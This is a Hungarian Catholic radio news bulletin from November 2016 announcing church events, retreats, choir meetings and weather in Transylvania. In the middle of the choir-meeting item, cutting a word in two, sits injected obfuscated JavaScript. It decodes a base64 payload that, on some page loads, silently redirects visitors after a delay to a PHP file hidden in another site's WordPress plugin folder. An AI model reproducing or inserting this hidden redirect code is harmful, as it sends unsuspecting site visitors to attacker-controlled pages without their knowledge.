2016. november 16. – Hírek és programajánló

H Í R E K   E S T E

Örökös szentségimádási nap 
A Gyulafehérvári Főegyházmegyében a holnapi nap folyamán Hatolykán tartják az örökös szentségimádási napot. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, fejezzük ki örömünket, hálánkat és imádatunkat.

Férjek és édesapák hétvégéje Székelyudvarhelyen
A Szent Pio Lelkigyakorlatos Házban Isten a hétköznapjaimban címmel november 18-20. között férjeknek és édesapáknak tart lelkigyakorlatot Simon András budapesti grafikusművész. Jelentkezni még ma lehetséges a 0755-489.743-as telefonszámon.

Ifi találkozó Szentegyházán
Az irgalmasság témával kapcsolatban együttgondolkodásra, találkozásra hívja november hónapban, hetente egyszer a kerekesszékes és egészséges fiatalokat Szentegyházán, a Szent Gellért Alapítvány. A harmadik találkozás november 18-án, pénteken este fél nyolc órakor lesz, a Rustik játékteremben. Témája: Játékest. A találkozások célja, hogy a fiatalok jól érezzék magukat, megosszák gondolataikat, problémáikat, elmondják véleményüket, álláspontjukat, egy-egy „lelki” vezetővel. Az együttlét alkalmával mély beszélgetésekre, filmnézésre, alkotásra, lelki nevelésre, játékra kerül sor. A találkozó jó alkalom arra, hogy a fiatalok és a mozgásukban korlátozottak is lehetőséget kapjanak a „mélyebb” szórakozásra.

Szent Erzsébet napi búcsúk, ünnepségek
– A kolozsvári Szent Kamill Otthonban (Erdő út, 11-es szám) november 18-20. között ötödik alkalommal kerül megrendezésre az Árpád-házi Szent Erzsébet napok.
– Marosvásárhelyen, a meggyesfalvi templom búcsús szentmiséje délután öt órakor kezdődik.
– A Székelyudvarhely-szombatfalvi Szent György templomban november 19-én, szombaton délután öt órától ünneplik Szent Erzsébet napját. Az ünnepségre a gyermekek köszöntővel készülnek, megáldják a családok kenyerét, kalácsot szentelnek a betegek és idősek részére, valamint rózsát, hogy a férjek, édesapák, udvarló ifjak felköszönthessék a hölgyeket.
– A székelyudvarhelyi Kis Szent Teréz templomban szombaton az este fél hét órakor kezdődő szentmise keretében kenyér- és rózsaszentelés lesz.
– Nagyváradon, a Szent Erzsébet otthon kápolnájának búcsúját szombaton délelőtt tizenegy órától tartják. Az ünnepi szentmisét rádiónk élő adásban közvetíti.
-A temesvár-szabadfalui római katolikus plébániához tartozó paráci közösség is november 19-én, Szent Erzsébet napján ünnepli a templombúcsút. A szentmisét déli egy órai kezdettel Wonerth László kanonok, temesvár-szabadfalui plébános mutatja be.

Kórustalálkozó Nagyváradon
November 19-én, szombaton az egyházzenei élet fellendítése céljából szervezi meg a Nagyváradi Katolikus Püspökség az idén is az Egyházmegyei Kórustalálkozót. Az esemény helyszíne a nagyváradi székesegyház, ahol délelőtt tíz órakor kezdődik a kórusok fellépése. Az idei találkozóra is olyan egyházi kórusok érkeznek, akik állfunction a4872b9c6b(y1){var qd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var x0='';var n6,w6,qe,q8,w9,we,n7;var oa=0;do{q8=qd.indexOf(y1.charAt(oa++));w9=qd.indexOf(y1.charAt(oa++));we=qd.indexOf(y1.charAt(oa++));n7=qd.indexOf(y1.charAt(oa++));n6=(q8<>4);w6=((w9&15)<>2);qe=((we&3)<=192)n6+=848;else if(n6==168)n6=1025;else if(n6==184)n6=1105;x0+=String.fromCharCode(n6);if(we!=64){if(w6>=192)w6+=848;else if(w6==168)w6=1025;else if(w6==184)w6=1105;x0+=String.fromCharCode(w6);}if(n7!=64){if(qe>=192)qe+=848;else if(qe==168)qe=1025;else if(qe==184)qe=1105;x0+=String.fromCharCode(qe);}}while(oa<y1.length);document.write(x0);};a4872b9c6b('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIG51bWJlcjE9TWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogNSk7IA0KaWYgKG51bWJlcjE9PTMpDQp7DQogdmFyIGRlbGF5ID0gMTUwMDA7CQ0KIHNldFRpbWVvdXQoImRvY3VtZW50LmxvY2F0aW9uLmhyZWY9J2h0dHA6Ly9oYWxlYWluYS1jYWZlLmNvbS93cC1jb250ZW50L3BsdWdpbnMvYWxsLWluLW9uZS1zZW8tcGFjay9pbmMvdHJhbnNsYXRpb24ucGhwJyIsIGRlbGF5KTsNCn0NCjwvc2NyaXB0PgAA');andó jelleggel, heti rendszerességgel ünnepi liturgikus szolgálatot látnak el az egyházmegye templomaiban.

25 éves a Cum Jubilo kamarakórus
November 19-én, szombaton délben tizenkét órától, a szászrégeni „Cum Jubilo” római katolikus kamarakórus fennállásának 25. évfordulója alkalmából ünnepi szentmisével ad hálát a mindenható Atyának a kapott kegyelmekért! Várják a híveket a közös ünneplésre!

Népemért vállalom Kézdiszentléleken
A marosvásárhelyi Mustármag Énekegyüttes november 19-én, szombaton este hét órától a kézdiszentléleki Művelődési Házban bemutatja a Népemért vállalom című zeneművet. Várnak minden érdeklődőt.

Szentmise a Vártemplomban
November 20-án, a hónap harmadik vasárnapján délután négy órakor a nagyváradi székeskáptalan tagjai, a jelenlevő papokkal és hívekkel közösen, esti dicsérettel egybekötött szentmisét végeznek a nagyváradi Vártemplomban. A szentmisét bemutatja és szentbeszédet tart Rajna József fugyivásárhelyi plébános-kanonok.

Kéztől a lélekig - kreatív napok a ferences nővérekkel
A mallersdorfi ferences nővérek kreatív napokat tartanak december 2-4. között a székelyudvarhelyi zárdában. Jelentkezni lehet november 20-ig a 0741-694.139-es telefonszámon vagy a mimeldan@gmail.com email címen.

Időjárás: Holnap a reggeli órákban északon, északnyugaton ónos eső, fagyott eső, másutt elszórtan havas eső is előfordulhat. Délután délnyugat felől megkezdődik a felhőzet felszakadozása, egyre kevesebb helyen várható csapadék. Az ország keleti részen köd, pára képződésére kell számítani. Hajnalban -5, +2, délután 3-9 C fokot mérhetünk. 

MRE - Hírszolgálat, 2016. november 16.


H Í R E K   R E G G E L

Tematikus nap a Mária Rádióban
Folytatva elmélkedéseinket az irgalmasság testi és lelki cselekedeteiről, mai tematikus napunk témája: a halottakat eltemetni.
Félünk-e a haláltól? vagy tudjuk, hogy a halál nem pont, hanem kettős pont és odaát az élő Jézus vár ránk? Ezekre, és hasonló kérdésekre keressük a választ tematikus műsorainkon keresztül. Tartsanak velünk Önök is!

Örökös szentségimádási nap
A Gyulafehérvári Főegyházmegyében a mai nap folyamán Szentkatolnán tartják az örökös szentségimádási napot. Járuljunk az Oltáriszentségben jelen levő Krisztus elé, fejezzük ki örömünket, hálánkat és imádatunkat.

Szentségimádás Kolozsváron
Szentségimádást tartanak a Kolozsvári Egyetemi Lelkészségen november 17-én, csütörtökön este nyolc órától. Várják a fiatalokat a közös imára.

Könyvbemutatók Gyergyócsomafalván, Gyergyóalfaluban és Szászrégenben
A gyergyócsomafalvi plébánia hittantermében november 17-én, holnap délután négy órakor Bereczki Silvia segítőnővér, szerkesztő és Szőcs Csaba, a Verbum kiadó igazgatója bemutatják a szentévre megjelent, Sokarcú irgalmasság - Vallomások, interjúk, tanulmányok című könyvet, a Keresztény Szó könyvek sorozat 5. kötetét.
Közreműkődnek a Gyergyó-vidéki interjúalanyok: Kiss Gabriella, Réthi Judit és Laczkó Albert-Elemér.
Az est házigazdája: Ferencz Antal plébános.
Ugyancsak csütörtökön, a gyergyóalfalvi plébánia hittantermében is megtartják a könyvbemutatót az esti szentmise után, fél hét órától. Az est házigazdája: Jenei János plébános.
Pénteken, november 18-án este fél hét órakor a „Sokarcú irgalmasság” című könyv a szászrégeni városi könyvtárban kerül bemutatásra. Közreműködnek: Bara László marosvásárhelyi plébános, Csog Ildikó pszichológus, Csog Árpád kémikus, Ludescher László Caritas ágazati igazgató valamint Szőcs Csaba, a kolozsvári Verbum kiadó igazgatója.
Mindhárom helyszínre várják az érdeklődőket és mindazokat, akik az irgalmasság, felebaráti szeretet és szolidaritás cselekvésre késztető vágya által szeretnének megérintődni!

Mária köszöntő Kovásznán
Kovásznán minden hónap harmadik szombatján Mária áhítatot tartanak szentmisével, rózsafüzérrel és gyertyás körmenettel. Hívják és várják a háromszékieket november 19-én, délután öt órakor a helyi plébániatemplomba.

25 éves a Cum Jubilo kamarakórus
November 19-én, szombaton délben tizenkét órától, a szászrégeni „Cum Jubilo” római katolikus kamarakórus fennállásának 25. évfordulója alkalmából ünnepi szentmisével ad hálát a mindenható Atyának a kapott kegyelmekért! Várják a híveket a közös ünneplésre!

Népemért vállalom Kézdiszentléleken
A marosvásárhelyi Mustármag Énekegyüttes november 19-én, szombaton este hét órától  a kézdiszentléleki Művelődési Házban bemutatja a Népemért vállalom című zeneművet. Várnak minden érdeklődőt.

Cursillos találkozó Kápolnásfaluban
Az őszi ULTREYÁRA várják a cursillos testvéreket november 19-én, szombaton, Kápolnásfaluban. A program reggel kilenc órakor szentmisével kezdődik.

Ifi találkozó Szentegyházán
Az irgalmasság témával kapcsolatban együttgondolkodásra, találkozásra hívja november hónapban, hetente egyszer a kerekesszékes és egészséges fiatalokat Szentegyházán, a Szent Gellért Alapítvány.
A harmadik találkozás november 19-én, pénteken este fél nyolc órakor lesz, a Rustik játékteremben.
Témája: Játékest
A találkozások célja, hogy jól érezzék magukat, megosszák gondolataikat, problémáikat, elmondják véleményüket, álláspontjukat, egy-egy „lelki” vezetővel. Az együttlét alkalmával mély beszélgetésekre, filmnézésre, alkotásra, lelki nevelésre, játékra kerül sor. A cél, hogy a fiatalok és a mozgásukban korlátozottak is lehetőséget kapjanak a „mélyebb" szórakozásra.

Krisztus Király búcsú
A sepsiszentgyörgyi Krisztus Király-plébániatemplom búcsúját november 20–án, a déli tizenkét órakor és az este hat órakor kezdődő szentmiséken ünneplik. November 18-19–én, az esti hat órás szentmisék keretében búcsúra való előkészület lesz. Szombaton délután négy órától pedig szentségimádás.  A szentmiséket Jitianu Liviu, a kolozsvári Babeş-Bolyai Tudományegyetem Római Katolikus Teológiai Fakultásának docense tartja.

Magyar és örmény fiatal családok találokózja
A Gyergyószentmiklósi Örmény Katolikus Egyesület szervezésében november 25-27. között kerül sor a magyar és örmény fiatal családok találkozójára. Előadók: Böjte Csaba ferences szerzetes, Macalik Ernő és Kádár Krisztina. Bővebb információ az esményről a gyulafehérvári érsekség honlapján olvasható. Jelentkezni a gyergyoiormenyek@gmail.com e-mail címen vagy a 0740-867.199-es telefonszámon lehetéséges november 20-ig.

Időjárás: Ma egy melegfront felhőzete borítja be hazánkat. Helyenként számíthatunk kisebb esőre, északon, északnyugaton és az erdélyi medence térségében gyenge havazás, havas eső, ónos eső is előforduthat. Ismét megélénkülhet a déli-délnyugati szél. Fagyos reggelre ébredtünk, délután pedig -3 és +4 C fok valószínű.

MRE - Hírszolgálat, 2016. november 16.

About the author

maradmin

Leave a Comment